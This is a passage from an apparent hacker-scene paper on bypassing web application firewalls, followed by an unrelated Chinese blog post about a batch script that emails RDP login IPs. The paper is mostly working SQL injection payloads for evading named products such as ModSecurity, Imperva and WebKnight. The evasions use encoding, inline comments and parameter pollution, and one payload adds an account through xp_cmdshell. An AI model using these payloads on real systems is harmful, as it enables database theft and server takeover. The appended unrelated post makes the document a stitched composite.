		and "Armorlogic Profense"  prior to 2.4.4 was bypassed by URL-encoded newline character.


		#Real World Example
		
		1. NukeSentinel (Nuke Evolution)
		
		[Nukesentinel.php Code]------------------------------------------------------------
		// Check for UNION attack
		// Copyright 2004(c) Raven PHP Scripts
		$blocker_row = $blocker_array[1];
		if($blocker_row['activate'] > 0) {
 		 if (stristr($nsnst_const['query_string'],'+union+') or \
		stristr($nsnst_const['query_string'],'%20union%20') or \
		stristr($nsnst_const['query_string'],'*/union/*') or \
		stristr($nsnst_const['query_string'],' union ') or \
		stristr($nsnst_const['query_string_base64'],'+union+') or \
		stristr($nsnst_const['query_string_base64'],'%20union%20') or \
		stristr($nsnst_const['query_string_base64'],'*/union/*') or \
		stristr($nsnst_const['query_string_base64'],' union ')) {  // block_ip($blocker_row);
		   die("BLOCK IP 1 " );
		  }
		}
		[End Code]-------------------------------------------------------------------------

		We can bypass their filtering with these script:
		
		Forbidden: http://victim.com/php-nuke/?/**/union/**/select…..
		Bypassed : http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select…
		Bypassed : http://victim.com/php-nuke/?%2f**%2funion%2f**%2fselect…


		2. Mod Security CRS (Credit: Johannes Dahse)
		
		[SecRule]--------------------------------------------------------------------------
		SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \ "phase2,rev:'2.2.1',capture,t:none,
		t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,
		msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',
		tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',
		setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},
		setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
		[End Rule]-------------------------------------------------------------------------

		We can bypass their filtering with this code:
		
		[Code]------------------------------------------------------------------------------
		http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
		[End Code]--------------------------------------------------------------------------

		From this attack, We can bypass Mod Security rule. Let see what's happen !! 
		
		MySQL Server supports 3 comment styles:
			- From a "#" character to the end of the line
			- From a "--" sequence to the end of the line
			- From a /* sequence to the following */ sequence, as in the C programming language.
			  This syntax enables a comment to extend over multiple lines because the beginning and closing sequences need
			  not be on the same line.

		The following example, We used "%0D%0A" as the new line characters. Let's take a look at the first request(to extract the DB user)
		The resulting SQL payload looked something like this:

			0 div 1 union#foo*/*/bar
			select#foo
			1,2,current_user
		
		However the SQL payload, when executed by the MySQL DB, looked something like this:

			0 div 1 union select 1,2,current_user	


	5. Buffer Overflow

		WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of data.
		Give a large amount of data allows our code executing	
	
		[Code]------------------------------------------------------------------------------
		http://victim.com/news.php?id=1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141
		414141414141….)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
		[End Code]--------------------------------------------------------------------------

	
	6. Inline Comments (Mysql Only)

		From MySQL 5.0 Reference Manual, MySQL Server supports some variants of C-style comments. These enable you to write
		code that includes MySQL extensions, but is still portable, by using comments of the following form:

		/*! MySQL-specific code */
		
		In this case, MySQL Server parses and executes the code within the comment as it would any other SQL statement,
		but other SQL servers will ignore the extensions.
		
		A lot of WAFs filter SQL keywords like /union\sselect\ig We can bypass this filter by using inline comments.
		
		[Code]------------------------------------------------------------------------------
		http://victim.com/news.php?id=1/*!UnIoN*/Select+1,2,3--
		[End Code]--------------------------------------------------------------------------
		
		Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can
		add more inline comments
	
		[Code]------------------------------------------------------------------------------
		http://victim.com/news.php?id=/*!UnIoN*/+/*!Select*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
		/*!Where*/+/*!TaBlE_sChEMa*/+like+database()--
		[End Code]--------------------------------------------------------------------------

		In a recent penetration test, we were able to bypass a Mod Security CRS and PentaSecurity-WAPPLE using this technique. More information show below:
		
		#################################################################################################################

		Vendor : Penta Security System
		Product: Wapple Web Application Firewall
		Patch released: 2011-10-02 (In SQL Injection Custom Policy Mode)
		Publish released: 2011-10-04
		Credit : Prathan Phongthiproek and Suphot Boonchamnan
	
		These scripts can all SQL Injection rules:	
			1 ||1=1
			1 /*!order by*/ 3
			1 /*!union select*/ 1,table_name from /*!information_schema.tables*/
			1 /*!union select*/ 1,column_name from /*!information_schema.columns where table_name = 0x7573657273*/
			1 /*!union select*/ /*!user,password*/ from /*!users*/
		################################################################################################################
		

	
########################################	
 [0x03] - Advanced Bypassing Techniques
########################################
		
	In this section, we offer 2 techniques are "HTTP Pollution: Split and Join" and "HTTP Parameter Contamination". 
From these techniques can bypass a lot of OpenSource and Commercial Web application firewall (WAF)
     
     
	++++++++++++++++++++++++++++++++++++++++++++++++++++
	 [0x03a] - HTTP Parameter Pollution: Split and Join
	++++++++++++++++++++++++++++++++++++++++++++++++++++

		HTTP Pollution is a new class of injection vulnerability by Luca Carettoni and Stefano Di Paola. HPP is a quite simple but
	effective hacking technique. HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting 
	query string. 

	Example of HPP: "http://victim.com/search.aspx?par1=val1&par1=val2"

	HTTP Parameter Handling: (Example)
	
	+------------------------------------------------------------------+
	| Web Server 	  | Parameter Interpretation	 | Example	   |
	+------------------------------------------------------------------+
	| ASP.NET/IIS	  | Concatenation by comma	 | par1=val1,val2  |
	| ASP/IIS	  | Concatenation by comma	 | par1=val1,val2  |
	| PHP/Apache	  | The last param is resulting  | par1=val2	   |
	| JSP/Tomcat	  | The first param is resulting | par1=val1	   |
	| Perl/Apache	  | The first param is resulting | par1=val1	   |
	| DBMan		  | Concatenation by two tildes  | par1=val1~~val2 |
	+------------------------------------------------------------------+
	
		What would happen with WAFs that do Query String parsing before applying filters ? (HPP can be used even to bypass WAFs)
	Some loose WAFs may analyze and validate a single parameter occurrence only (first or last one). Whenever the deal environment concatenates
	multiple occurrences (ASP, ASP.NET, DBMan,…) an aggressor can split the malicious payload.

		In a recent penetration test (Again), we were able to bypass a Imperva SecureSphere using "HPP+Inline Comment" on ASP/ASP.NET environment.
	This technique can bypass other Commercial WAFs too. More information about "HPP+Inline Comment" show below:	

	
	#Real World Example:

	1. Mod Security CRS (Credit: Lavakumar Kuppan)
		
		The following request matches against the ModSecurity CRS as a SQL Injection attack and is blocked.
		
		Forbidden: http://victim.com/search.aspx?q=select name,password from users

		When the same payload is split against multiple parameters of the same name ModSecurity fails to block it.

		Bypassed : http://victim.com/search.aspx?q=select name&q=password from users

		
		Let's see what's happen, ModSecurity's interpretation is
		
		q=select name
		q=password from users

		ASP/ASP.NET's interpretation is
		q=select name,password from users

		*Tip: This attack can be carried out on a POST variable in a similar way


	2. Commercial WAFs
		
		Forbidden: http://victim.com/search.aspx?q=select name,password from users

		Now we use HPP+Inline comment to bypass it.

		Bypassed : http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users

		
		Analyzing, WAF's interpretation is

		q=select/*
		q=*/name
		q=password/*
		q=*/from/*
		q=*/users
		
		ASP/ASP.NET's interpretation is
		q=select/*,*/name,password/*,*/from/*,*/users
		q=select name,password from users


	3. IBM Web Application Firewall (Credit: Wendel Guglielmetti Henrique of Trustwave's SpiderLabs)
		
		Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell “net user zeq3ul UrWaFisShiT /add” --

		Now we use HPP+Inline comment to bypass it.

		Bypassed : http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ “net user lucifer UrWaFisShiT” /*&id=1*/ --

		
		Analyzing, WAF's interpretation is

		id=1’; /*
		id=1*/ EXEC /*
		id=1*/ master..xp_cmdshell /*
		id=1*/ “net user zeq3ul UrWaFisShiT” /*
		id=1*/ --
		
		ASP/ASP.NET's interpretation is
		id=1’; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ “net user zeq3ul UrWaFisShiT” /*,1*/ --
		id=1’; EXEC master..xp_cmdshell “net user zeq3ul UrWaFisShiT” --
		

		The easiest mitigation to this attack would be for the WAF to disallow multiple instances of the same parameter in a single HTTP request. 
	This would prevent all variations of this attack.
		However this might not be possible in all cases as some applications might have a legitimate need for multiple duplicate parameters. 
	And they might be designed to send and accept multiple HTTP parameters of the same name in the same request.To protect these applications the WAF 
	should also interpret the HTTP request in the same way the web application would.

		
	++++++++++++++++++++++++++++++++++++++++
	 [0x03b] - HTTP Parameter Contamination
	++++++++++++++++++++++++++++++++++++++++

		HTTP Parameter Contamination (HPC) original idea comes from the innovative approach found in HPP research by 
	exploring deeper and exploiting strange behaviors in Web Server components, Web Applications and Browsers as a result of query string
	parameter contamination with reserved or non expects characters. 
	
	Some facts:
     	- The term Query String is commonly used to refer to the part between the  "?" and the end of the URI
	- As defined in the RFC 3986, it is a series of field-value pairs
	- Pairs are separated by "&" or ";"
	- RFC 2396 defines two classes of characters:
		Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
		Reserved  : ; / ? : @ & = + $ ,
		Unwise    : { } | \ ^ [ ] ` 

		Different web servers have different logic for processing special created requests. There are more web server, backend platform and special character combinations,
	but we will stop here this time.

	Query string and Web server response (Example)
	
	+-----------------------------------------------------------+
	| Query String	  |    Web Servers response / GET values    |
	+-----------------------------------------------------------+
	| 		  | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP	    |
	+-----------------------------------------------------------+
	| ?test[1=2	  | test_1=2	 	     | test[1=2	    |
	| ?test=%  	  | test=%		     | test=	    |
	| ?test%00=1	  | test=1	       	     | test=1	    |
	| ?test=1%001	  | NULL		     | test=1	    |
	| ?test+d=1+2	  | test_d=1 2		     | test d=1 2   |
	+-----------------------------------------------------------+
	
	Magic character "%" affect to ASP/ASP.NET	

	+--------------------------------------------------------------------+
	| 	Keywords     |        WAF   		  |  ASP/ASP.NET     |
	+--------------------------------------------------------------------+
	| sele%ct * fr%om..  | sele%ct * fr%om.. 	  | select * from..  |
	| ;dr%op ta%ble xxx  | ;dr%op ta%ble xxx	  | ;drop table xxx  |
	| <scr%ipt>	     | <scr%ipt>		  | <script>	     |
	| <if%rame>	     | <if%rame>		  | <iframe>         |
	+--------------------------------------------------------------------+


	#Real world examples:

	1. Bypass Mod_Security SQL Injection rule (modsecurity_crs_41_sql_injection_attacks.conf) 

		[Filtered]----------------------------------------------------------------------------------
	
		[Sun Jun 12 12:30:16 2011] [error] [client 192.168.2.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\bsys\\.user_objects\\b" 
		at ARGS_NAMES:sys.user_objects. [file "/etc/apache2/conf.d/crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "110"] [id "959519"] 
		[rev "2.2.0"] [msg 	"Blind SQL Injection Attack"] [data "sys.user_objects"] [severity "CRITICAL"] [tag "WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] 
		[tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "localhost"] [uri "/"] [unique_id "TfT3gH8AAQEAAAPyLQQAAAAA"]

		[End Code]------------------------------------------------------------------------------

		Forbidden: http://localhost/?xp_cmdshell
		Bypassed : http://localhost/?xp[cmdshell

	2. Bypass URLScan 3.1 DenyQueryStringSequences rule
	
		Forbidden: http://localhost/test.asp?file=../bla.txt
		Bypassed : http://localhost/test.asp?file=.%./bla.txt

	3. Bypass AQTRONIX Webknight (WAF for IIS and ASP/ASP.Net)

		Forbidden: http://victim.com/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
		Bypassed : http://victim.com/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

		From this situation, Webknight use SQL keywords filtering when we use "HTTP contamination" by insert "%" into SQL keywords WAF is bypassed and sending these
		command to Web server: "id=10 and 1=0/(select top 1 table_name from information_schema.tables)" because "%" is cutter in web server.
	

		These types of hacking techniques are always interesting because they reveal new perspectives on security problems.
	Many applications are found to be vulnerable to this kind of abuse because there are no defined rules for strange web server behaviors.
		HPC can be used to extend HPP attack with spoofing real parameter name in the QUERY_STRING with "%" character on an IIS/ASP platform,
	if there is WAF who blocks this kind of an attack.

	

######################################	
 [0x04] - How to protect your website
######################################

- Implement Software Development Life Cycle (SDLC)
- Secure Coding: Validate all inputs and outputs
- PenTest before online
- Harden it !!
- Revisit PenTest
- Deploy WAF (For Optional)
- Always check WAF patch


#####################	
 [0x05] - Conclusion
#####################
 
- WAFs is not the long-expected
- It's functional limitations, WAF is not able to protect a web app from all possible vulnerabilities
- It's necessary to adapt WAF filter to the particular web app being protected
- WAF doesn't eliminate a vulnerability, It just partly screens the attack vector


#####################
 [0x06] - References
#####################

[1] WAF Bypass: SQL Injection - Kyle
[2] http://cwe.mitre.org/data/definitions/98.html
[3] HTTP Parameter Contamination - Ivan Markovic NSS
[4] Split and Join - Lavakumar Kuppan
[5] HTTP Parameter Pollution - Luca Carettoni and Stefano di Paola
[6] blog.spiderlabs.com


####################
 [0x07] - Greetz To
####################
	
Greetz	    :  ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
Special Thx :  Exploit-db.com


				----------------------------------------------------
		Our disclosure purpose isn't helping security products but need to reveal theirs shit. 
		   Security Products not able to 100% protect from damn config/coding of admin. 
				  Just need a time and imagination for breach it !!
				----------------------------------------------------

自动实时监控Windows2003服务器终端登录

朋友一台Windows服务器被黑了,而且还被人恶意删除了一些数据备份,帮其做了下安全加固,考虑到服务器都是通过Windows 终端服务器来管理的,就想办法对其登录做个监控,找了个命令行下发邮件的小工具blat还有批处理,做了个简单的监控程序,功能是当有人通过终端登录且成功后,会向指定的邮箱发送登录者IP地址。

1.先下载blat解压缩到c盘blat目录下面。

2.任意目录新建一个bat文件,我这里是mail.bat,内容如下,

 

@echo off
date /t >mail.txt
time /t >>mail.txt
netstat -n -p tcp | find "3389" >>mail.txt
:::::::::::::: config::::::::::::::
set from=Neeao.com@126.com
set user=neeao.com
set pass=neeao.com
set to=neeao.com@qq.com
set subj=3389
set mail=mail.txt
set server=smtp.126.com
set debug=-debug -log blat.log -timestamp
::::::::::::::::: run blat :::::::::::::::::
C:\blat\full\blat.exe %mail% -to %to% -base64 -charset Gb2312 -subject %subj%  -server %server% -f %from% -u %user% -pw %pass% %debug%
start Explorer

很简单的了,先通过bat查找哪个ip连接到了本机的3389端口,然后邮件发送到指定邮箱。

3.进入控制面板—管理工具—终端服务器配置—RDP-Tcp—属性-环境-用户登录时启用下列程序—在程序路径和文件名—写“C:\mail.bat”—起始于—写“C:\”这样就ok了。

4.注销,重新登录,看是否能收到邮件。如果出错的话,桌面出不来的话,可通过ctrl+alt+end来呼出任务管理器来调用桌面。

5.目前发现个小bug,就是登录的时候,会弹出一个cmd的框。

6.如果开通邮箱的短信通知,或者使用139的邮箱,可以达到实时的手机短信通知,有兴趣的可以试试。

参考资料:

0.http://hi.baidu.com/testvbpro/blog/item/5e8aa9c7efb063d1d1006084.html 1.http://xuyafei202.blog.163.com/blog/static/2798837320105107550913/